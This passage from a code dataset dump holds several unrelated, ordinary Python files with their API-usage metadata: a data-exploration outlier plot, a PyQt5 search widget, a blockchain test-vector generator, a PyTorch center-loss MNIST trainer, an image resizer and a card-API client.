"usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 200, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QListWidgetItem", "line_number": 216, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 216, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.warning", "line_number": 221, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 221, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 221, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 223, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 223, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 233, "usage_type": "call"}, {"api_name": "natsort.natsorted", "line_number": 236, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 246, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 246, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 246, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 286, "usage_type": "call"}, {"api_name": "os.path", "line_number": 286, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 288, "usage_type": "call"}, {"api_name": "libs.shape.Shape", "line_number": 298, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 301, "usage_type": "call"}, {"api_name": "libs.shape.Shape", "line_number": 303, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 310, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 323, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 323, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 324, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 324, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 324, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 496, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 496, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 496, "usage_type": 
"attribute"}, {"api_name": "sys.exit", "line_number": 508, "usage_type": "call"}]} +{"seq_id": "276513578", "text": "#-*- coding: utf-8 -*-\n# 基本信息统计\nimport pandas as pd\ncatering_sale='C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\catering_sale.xls'\ndata=pd.read_excel(catering_sale,index_col='日期')\ndetails=data.describe()\nprint(details)\nprint('')\n\n# 异常值检测\nimport matplotlib.pyplot as plt #图像库\nplt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus']=False\n\nplt.figure() #画图\np=data.boxplot(return_type='dict')#画箱线图,直接使用DataFrame的方法\nx=p['fliers'][0].get_xdata()# 第一个异常点的数值\ny=p['fliers'][0].get_ydata()# 'flies'即为异常值的标签\ny.sort()#排序\n\n#用annotate添加注释\n#其中有些相近的点,注解会出现重叠,难以看清,需要一些技巧来控制。\n#以下参数都是经过调试的,需要具体问题具体调试。\nfor i in range(len(x)): \n if i>0:\n plt.annotate(y[i], xy = (x[i],y[i]), xytext=(x[i]+0.05 -1.8/(y[i]-y[i-1]),y[i]))\n else:\n plt.annotate(y[i], xy = (x[i],y[i]), xytext=(x[i]+0.08,y[i]))\n\nplt.show() #展示箱线图\n\n\n#一致性分析\n", "sub_path": "数据探索/基本信息和异常值分析.py", "file_name": "基本信息和异常值分析.py", "file_ext": "py", "file_size_in_byte": 1096, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_excel", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 12, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "362723289", "text": "from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QVBoxLayout, QGridLayout, QLabel, QSizePolicy, \\\n QStackedWidget, QBoxLayout, QHBoxLayout, QFileDialog, QLineEdit\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QColor, QLinearGradient, QBrush, QPalette, QFont, QPixmap\n\n\nclass AccessData(QWidget):\n\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def enterPress(self, text):\n print(\"edited\" + text)\n\n def initUI(self):\n grid = QGridLayout()\n grid.setSpacing(10)\n\n searchBar = QLineEdit()\n searchBar.setPlaceholderText(\"Search...\")\n\n searchBar.editingFinished.connect(self.enterPress)\n\n go_button = QPushButton()\n go_button.setText(\"Go\")\n\n viewAll = QPushButton()\n viewAll.setText(\"View All\")\n\n\n grid.addWidget(searchBar, 1, 0)\n grid.addWidget(go_button, 1, 1)\n grid.addWidget(viewAll, 1, 2)\n\n self.setLayout(grid)\n self.setGeometry(300, 300, 350, 300)\n\n self.show()\n\n\n\n\n", "sub_path": "scratchSpaces/suzieScratchSpace/AccessData.py", "file_name": "AccessData.py", "file_ext": "py", "file_size_in_byte": 1038, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 7, 
"usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QGridLayout", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "198224283", "text": "from typing import Dict, List, IO, Any\nimport json\n\nimport ed25519\n\nfrom e2e.Libs.BLS import PrivateKey, PublicKey\n\nfrom e2e.Classes.Transactions.Data import Data\n\nfrom e2e.Classes.Consensus.Verification import SignedVerification\nfrom e2e.Classes.Consensus.VerificationPacket import SignedVerificationPacket, SignedMeritRemovalVerificationPacket\nfrom e2e.Classes.Consensus.MeritRemoval import SignedMeritRemoval\n\nfrom e2e.Classes.Consensus.SpamFilter import SpamFilter\n\nfrom e2e.Vectors.Generation.PrototypeChain import PrototypeChain\n\nedPrivKey: ed25519.SigningKey = ed25519.SigningKey(b'\\0' * 32)\nedPubKey: ed25519.VerifyingKey = edPrivKey.get_verifying_key()\n\nblsPrivKey: PrivateKey = PrivateKey(0)\nblsPubKey: PublicKey = blsPrivKey.toPublicKey()\n\nspamFilter: SpamFilter = SpamFilter(5)\n\ne1Chain: PrototypeChain = PrototypeChain(1, False)\ne2Chain: PrototypeChain = PrototypeChain(1, False)\n\n#Create the initial Data and two competing Datas.\ndatas: List[Data] = [Data(bytes(32), edPubKey.to_bytes())]\ndatas.append(Data(datas[0].hash, b\"Initial Data.\"))\ndatas.append(Data(datas[0].hash, b\"Second Data.\"))\nfor data in datas:\n data.sign(edPrivKey)\n data.beat(spamFilter)\n\n#Create Verifications for all 3.\nverifs: List[SignedVerification] = []\nfor data in datas:\n verifs.append(SignedVerification(data.hash, 0))\n verifs[-1].sign(0, blsPrivKey)\n\n#Create a MeritRemoval VerificationPacket for the second and third Datas which don't involve our holder.\npackets: List[SignedMeritRemovalVerificationPacket] = [\n SignedMeritRemovalVerificationPacket(\n SignedVerificationPacket(verifs[1].hash),\n [PrivateKey(1).toPublicKey().serialize()],\n PrivateKey(1).sign(verifs[1].signatureSerialize())\n ),\n SignedMeritRemovalVerificationPacket(\n SignedVerificationPacket(verifs[1].hash),\n [PrivateKey(1).toPublicKey().serialize()],\n PrivateKey(1).sign(verifs[1].signatureSerialize())\n )\n]\n\n#Create a MeritRemoval out of the conflicting Verifications.\ne1MR: SignedMeritRemoval = SignedMeritRemoval(verifs[1], packets[0], 0)\ne2MR: SignedMeritRemoval = SignedMeritRemoval(packets[1], verifs[2], 0)\n\n#Generate a Block containing the MeritRemoval for each chain.\ne1Chain.add(elements=[e1MR])\ne2Chain.add(elements=[e2MR])\n\nresult: Dict[str, Any] = {\n \"blockchains\": [e1Chain.toJSON(), e2Chain.toJSON()],\n \"datas\": [datas[0].toJSON(), datas[1].toJSON(), datas[2].toJSON()]\n}\nvectors: IO[Any] = open(\"e2e/Vectors/Consensus/MeritRemoval/HundredThirtyThree.json\", \"w\")\nvectors.write(json.dumps(result))\nvectors.close()\n", "sub_path": "e2e/Vectors/Generation/Consensus/MeritRemoval/HundredThirtyThree.py", "file_name": "HundredThirtyThree.py", "file_ext": "py", "file_size_in_byte": 2517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "ed25519.SigningKey", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ed25519.VerifyingKey", "line_number": 19, "usage_type": "attribute"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 21, "usage_type": "name"}, {"api_name": "e2e.Libs.BLS.PublicKey", "line_number": 
22, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.SpamFilter.SpamFilter", "line_number": 24, "usage_type": "name"}, {"api_name": "e2e.Vectors.Generation.PrototypeChain.PrototypeChain", "line_number": 26, "usage_type": "name"}, {"api_name": "e2e.Vectors.Generation.PrototypeChain.PrototypeChain", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "e2e.Classes.Transactions.Data.Data", "line_number": 30, "usage_type": "name"}, {"api_name": "e2e.Classes.Transactions.Data.Data", "line_number": 31, "usage_type": "call"}, {"api_name": "e2e.Classes.Transactions.Data.Data", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.Verification.SignedVerification", "line_number": 38, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.Verification.SignedVerification", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 44, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedMeritRemovalVerificationPacket", "line_number": 44, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedMeritRemovalVerificationPacket", "line_number": 45, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedVerificationPacket", "line_number": 46, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 47, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 48, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedMeritRemovalVerificationPacket", "line_number": 50, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.VerificationPacket.SignedVerificationPacket", "line_number": 51, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 52, "usage_type": "call"}, {"api_name": "e2e.Libs.BLS.PrivateKey", "line_number": 53, "usage_type": "call"}, {"api_name": "e2e.Classes.Consensus.MeritRemoval.SignedMeritRemoval", "line_number": 58, "usage_type": "name"}, {"api_name": "e2e.Classes.Consensus.MeritRemoval.SignedMeritRemoval", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.IO", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "445060421", "text": "import os\nimport time\nimport datetime\nimport torch\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torchvision.datasets import MNIST\nfrom torch.utils.data import DataLoader\nfrom torch import nn\nfrom torch import optim as optim\nfrom matplotlib import pyplot as plt\n\nclass LeNets(nn.Module):\n def __init__(self):\n super(LeNets, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=32,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.Conv2d(in_channels=32,\n out_channels=32,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.MaxPool2d(kernel_size=2,\n stride=2),\n nn.Conv2d(in_channels=32,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.Conv2d(in_channels=64,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.MaxPool2d(kernel_size=2,\n 
stride=2),\n nn.Conv2d(in_channels=64,\n out_channels=128,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.Conv2d(in_channels=128,\n out_channels=128,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.PReLU(),\n nn.MaxPool2d(kernel_size=2,\n stride=2)\n )\n\n self.liner1 = nn.Sequential(\n nn.Linear(in_features=128 * 3 * 3,\n out_features=2),\n nn.PReLU()\n )\n self.liner2 = nn.Linear(in_features=2,\n out_features=10)\n\n def forward(self,input):\n x = self.conv1(input)\n x = x.view(-1, 128*3*3)\n Coordinate = self.liner1(x)\n Predict = self.liner2(Coordinate)\n # F.log_softmax(Predict, dim=1)\n\n return Coordinate, F.log_softmax(Predict, dim=1)\n\nclass Centerloss(nn.Module):\n def __init__(self, class_num, feat_num, iscuda):\n super(Centerloss, self).__init__()\n self.iscuda = iscuda\n self.center = nn.Parameter(torch.randn(class_num, feat_num))\n if self.iscuda:\n self.center.cuda()\n\n def forward(self, coordinate, labels):\n\n labels = labels.cpu().float()\n count = torch.histc(labels, 10, min=0, max=9).cuda()\n labels = labels.cuda()\n num = torch.index_select(count, 0, labels.long())\n centers = torch.index_select(self.center, 0, labels.long())\n loss = torch.sum(torch.sqrt(torch.sum((coordinate - centers)**2, dim=1))/num)/labels.size(0)\n return loss\n\nclass Visualization:\n def __init__(self, coordinates, labels, epoch, save_path):\n self.c = ['#ff0000', '#ffff00', '#00ff00', '#00ffff', '#0000ff',\n '#ff00ff', '#990000', '#999900', '#009900', '#009999']\n self.coordinates = coordinates\n self.labels = labels\n self.epoch = epoch\n self.save_path = save_path\n self.forward()\n\n def forward(self):\n plt.ion()\n plt.clf()\n\n for i in range(10):\n plt.title('Centerloss')\n plt.plot(self.coordinates[self.labels == i, 0], self.coordinates[self.labels == i, 1], '.', color=self.c[i])\n plt.xlim(left=-5, right=5)\n plt.ylim(bottom=-5, top=5)\n plt.text(-4, 4, 'epoch={}'.format(self.epoch))\n plt.legend(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'], loc='upper right')\n if not os.path.exists(self.save_path):\n os.mkdir(self.save_path)\n plt.savefig(os.path.join(self.save_path, 'epoch={}.jpg'.format(self.epoch)))\n plt.show()\n plt.pause(0.1)\n plt.ioff()\n\nclass Train:\n def __init__(self, path, softmaxloss_para_path, centerloss_para_path, save_path, lambda_parameters, iscuda):\n self.iscuda = iscuda\n self.lenet = LeNets()\n self.nllloss = nn.NLLLoss()\n # self.nllloss = nn.CrossEntropyLoss()\n self.centerloss = Centerloss(10, 2, self.iscuda)\n self.path = path\n self.save_path = save_path\n self.softmax_para_path = softmaxloss_para_path\n self.centerloss_para_path = centerloss_para_path\n self.lambda_parameters = lambda_parameters\n\n self.optimizernn = optim.Adam(self.lenet.parameters(), lr=0.0005)\n self.optimizerct = optim.SGD(self.centerloss.parameters(), lr=0.001)\n\n if os.path.exists(self.path):\n self.lenet.load_state_dict(torch.load(self.softmax_para_path))\n self.centerloss.load_state_dict(torch.load(self.centerloss_para_path))\n if self.iscuda:\n self.lenet.cuda()\n self.centerloss.cuda()\n self.train()\n\n def train(self):\n coordinates = []\n labels = []\n flag = 1.5\n\n for i, (data, label) in enumerate(dataloder):\n if self.iscuda:\n data = data.cuda()\n label = label.cuda()\n coordinate, predict = self.lenet(data)\n\n softmaxloss = self.nllloss(predict, label)\n centerloss = self.centerloss(coordinate, label)\n loss = softmaxloss + self.lambda_parameters * centerloss\n\n coordinates.append(coordinate)\n labels.append(label)\n\n if loss < flag:\n if not 
os.path.exists(self.path):\n os.mkdir(self.path)\n torch.save(self.lenet.state_dict(), self.softmax_para_path)\n torch.save(self.centerloss.state_dict(), self.centerloss_para_path)\n flag = loss\n self.optimizernn.zero_grad()\n self.optimizerct.zero_grad()\n loss.backward()\n self.optimizernn.step()\n self.optimizerct.step()\n print('Training epoch: {}'.format(epoch))\n print('total_loss:', loss.item())\n print('softmaxloss:', softmaxloss.item())\n print('centerloss:', centerloss.item())\n\n coord = torch.cat(coordinates).cpu().data.numpy()\n lab = torch.cat(labels).cpu().data.numpy()\n\n if epoch % 1 == 0:\n Visualization(coord, lab, epoch, self.save_path)\n\nif __name__ == '__main__':\n start_time = time.time()\n path = './parameters8'\n softmaxloss_para_path = './parameters8/Softmaxloss.pkl'\n centerloss_para_path = './parameters8/Centerloss.pkl'\n save_path = './images8'\n\n lambda_parameters = 1\n epoch = 0\n\n mydataset = MNIST('./MNIST', train=True, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))]), download=True)\n dataloder = DataLoader(mydataset, batch_size=128, shuffle=True, num_workers=4)\n for _ in range(100):\n train = Train(path, softmaxloss_para_path, centerloss_para_path, save_path, lambda_parameters, True)\n epoch += 1\n\n\n Train_time = (time.time() - start_time) / 60\n print('{} training time:'.format('centerloss'), int(Train_time), 'minutes')\n print(datetime.datetime.now())\n", "sub_path": "centerloss_mnist.py", "file_name": "centerloss_mnist.py", "file_ext": "py", "file_size_in_byte": 7502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": 
"torch.nn.PReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.PReLU", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.histc", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 
119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ioff", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 183, "usage_type": "call"}, {"api_name": "time.time", "line_number": 189, "usage_type": "call"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 198, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 198, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 198, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 199, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 199, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 200, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 201, "usage_type": "call"}, {"api_name": "time.time", "line_number": 207, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 209, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 209, "usage_type": "attribute"}]} +{"seq_id": "484166572", "text": "from PIL import Image\nimport numpy as np\nimport pdb\nimport os\n\ntn_size = 2e5\np_size = 1e6\n\ndef get_two_power(n):\n if n > 2:\n return 1 + get_two_power(n/2)\n else:\n return 1\n\n\nkvs = []\nfor fname in os.listdir('./'):\n if fname.endswith('.jpg') and not fname.startswith('tn-'):\n print(fname)\n fsize = os.stat(fname).st_size\n\n im = Image.open(fname)\n l, w = im.size\n\n if fsize > tn_size:\n ratio = fsize / tn_size\n two_power = get_two_power(ratio)\n two_ratio = np.sqrt(2 ** two_power)\n \n new_l = int(l/two_ratio)\n new_w = int(w/two_ratio)\n\n im2 = 
im.resize((new_l, new_w))\n im2.save('thumbnails/tn-' + fname)\n else:\n im.save('thumbnails/tn-' + fname)\n\n if fsize > p_size:\n ratio = fsize / p_size\n two_power = get_two_power(ratio)\n two_ratio = np.sqrt(2 ** two_power)\n\n new_l = int(l/two_ratio)\n new_w = int(w/two_ratio)\n\n im3 = im.resize((new_l, new_w))\n im3.save(fname)\n", "sub_path": "images/photos/sizer.py", "file_name": "sizer.py", "file_ext": "py", "file_size_in_byte": 1113, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "579004099", "text": "from typing import List\n\nimport requests\n\nfrom royale.models.card import Card\n\n\ndef get_all_cards() -> List[Card]:\n response = requests.get('https://statsroyale.com/api/cards')\n if response.ok:\n card_list = [Card(**card) for card in\n response.json()] # for card in response make new card by unpacking the card in the list\n return card_list\n else:\n raise Exception('Response was not ok. Status Code: ' + str(response.status_code)) # status_code is an int; convert before concatenating\n\n\ndef get_a_card_by_name(card_name: str) -> Card:\n cards = get_all_cards()\n card = next(card for card in cards if card.name == card_name)\n return card\n\n\n# this would be used if we only had a list of ids to do our search, would work the same as get card by name function\ndef get_a_card_by_id(card_id: int) -> Card:\n cards = get_all_cards()\n card = next(card for card in cards if card.id == card_id)\n return card\n", "sub_path": "royale/services/card_service.py", "file_name": "card_service.py", "file_ext": "py", "file_size_in_byte": 905, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "royale.models.card.Card", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "royale.models.card.Card", "line_number": 8, "usage_type": "name"}, {"api_name": "royale.models.card.Card", "line_number": 18, "usage_type": "name"}, {"api_name": "royale.models.card.Card", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "381205237", "text": "# \n\nimport bpy\nimport configparser\nfrom .w_b_scene import BlenderSceneW\nfrom . import b_tools\nfrom . 
